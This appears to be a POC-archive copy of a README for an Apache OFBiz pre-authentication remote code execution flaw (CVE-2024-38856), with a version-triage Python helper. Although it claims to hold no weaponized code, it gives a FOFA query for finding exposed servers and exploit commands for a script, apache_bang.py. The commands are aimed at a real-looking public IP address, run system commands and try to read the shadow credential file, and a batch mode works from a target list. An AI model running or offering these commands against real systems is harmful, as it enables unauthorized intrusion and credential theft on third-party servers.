Related vulnerability
Title: Apache OFBiz security vulnerability (CVE-2024-38856). Description: Apache OFBiz is an enterprise resource planning (ERP) system from the Apache Software Foundation (USA). It provides a complete set of Java-based web application components and tools. Apache OFBiz 18.12.14 and earlier contain a security vulnerability caused by an authorization error, which lets unauthenticated endpoints execute screen-rendering code.
Description
CVE-2024-38856: Apache OFBiz remote code execution Scanner & Exploit
Introduction
# CVE-2024-38856 — Apache OFBiz (Repository documentation)
> **Repository purpose:** informational documentation about CVE-2024-38856 (Apache OFBiz incorrect-authorization / pre-auth RCE).
> This repository **does not** contain weaponized exploit code. It is intended for defensive research, patching guidance, detection, and safe lab testing only.
---
## Overview
**CVE-2024-38856** is an incorrect-authorization vulnerability in Apache OFBiz that may allow unauthenticated access to certain endpoints and, under specific conditions, enable execution of screen-rendering code, which can lead to remote code execution on affected systems. The issue was fixed in Apache OFBiz **18.12.15**; earlier releases up to and including **18.12.14** are affected.
**Severity / Impact:** multiple security vendors and researchers rated this vulnerability as critical — it can lead to unauthenticated remote code execution on vulnerable instances, and exploitation attempts have been observed in the wild. Administrators should treat exposed OFBiz instances as high-priority remediation items.
---
## Affected versions
- Apache OFBiz: **through 18.12.14** (i.e., all releases <= 18.12.14 are considered vulnerable). The issue was addressed in **18.12.15**; upgrading is recommended.
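As an added example (not code from this repository), a small Python triage helper that applies the affected-version range above to an inventory of OFBiz hosts. The hostnames and version strings in the sample inventory are constructed; unparsable version strings are reported as `unknown` rather than silently treated as fixed.

```python
import re
from typing import List, Tuple

# Fixed release per the advisory text above; every version below it
# (i.e. <= 18.12.14) is treated as affected.
FIXED_VERSION = (18, 12, 15)
# Accept an optional leading 'v' and ignore any suffix after major.minor.patch.
_VERSION_RE = re.compile(r"^\s*v?(\d+)\.(\d+)\.(\d+)")


def parse_version(text: str) -> Tuple[int, int, int]:
    """Parse an OFBiz version string such as '18.12.14' into an int triple.
    Raises ValueError when no major.minor.patch triple is present."""
    m = _VERSION_RE.match(text)
    if not m:
        raise ValueError(f"unrecognised version string: {text!r}")
    major, minor, patch = (int(x) for x in m.groups())
    return (major, minor, patch)


def is_affected(version: str) -> bool:
    """True when the version precedes the fixed release 18.12.15."""
    return parse_version(version) < FIXED_VERSION


def triage(inventory: List[Tuple[str, str]]) -> List[Tuple[str, str, str]]:
    """Classify each (host, version) pair as 'affected', 'fixed' or 'unknown'."""
    results = []
    for host, version in inventory:
        try:
            status = "affected" if is_affected(version) else "fixed"
        except ValueError:
            status = "unknown"  # needs manual verification, do not assume fixed
        results.append((host, version, status))
    return results


# Constructed sample inventory (hostnames and versions are made up).
SAMPLE_INVENTORY = [
    ("erp-prod.example.internal", "18.12.14"),
    ("erp-stage.example.internal", "18.12.15"),
    ("erp-legacy.example.internal", "17.12.11"),
    ("erp-dev.example.internal", "v18.12.9"),
    ("erp-old.example.internal", "unknown"),
]

if __name__ == "__main__":
    for host, version, status in triage(SAMPLE_INVENTORY):
        print(f"{host:32} {version:12} {status}")
```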
FOFA query:

```
fofa : app="Apache_OFBiz" && port="8443"
```
<img width="1916" height="956" alt="Screenshot 2025-10-10 183057" src="https://github.com/user-attachments/assets/f16df50d-168f-467c-8b90-2e114d66d59d" />
# Exploit:

```
git clone https://github.com/Hex00-0x4/CVE-2024-38856-Apache-OFBiz.git
cd CVE-2024-38856-Apache-OFBiz
python3 apache_bang.py --target https://139.5.191.156 --port 8443 --exploit -c "whoami"
python3 apache_bang.py --target https://139.5.191.156 --port 8443 --exploit -c "ifconfig"
python3 apache_bang.py --target https://139.5.191.156 --port 8443 --exploit -c "ls"
python3 apache_bang.py --target https://139.5.191.156 --port 8443 --exploit -c "cat /etc/shodow"
```
<img width="1478" height="745" alt="Screenshot 2025-10-10 184101" src="https://github.com/user-attachments/assets/87b05f89-3098-4a05-b30f-2e35713f4069" />
```
python3 apache_bang.py --file target.txt -c "ls"
```
<img width="1465" height="739" alt="Screenshot 2025-10-10 075018" src="https://github.com/user-attachments/assets/26b47ec5-ea76-4011-beda-ab6ccf38ced0" />
File snapshot
[4.0K] /data/pocs/56358b3bf7c9b571b0637d0f7224ac4eb7345e2a
├── [7.9K] Apache_bang.py
├── [1.0K] LICENSE
└── [2.5K] README.md
1 directory, 3 files
Notes
1. It is recommended to access the code through the original source first.
2. If the source is no longer available or cannot be reached, send an email to f.jinxu#gmail.com to request a local snapshot (replace # with @).
3. Shenlong has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for or donating to the local POC. Thank you for your support.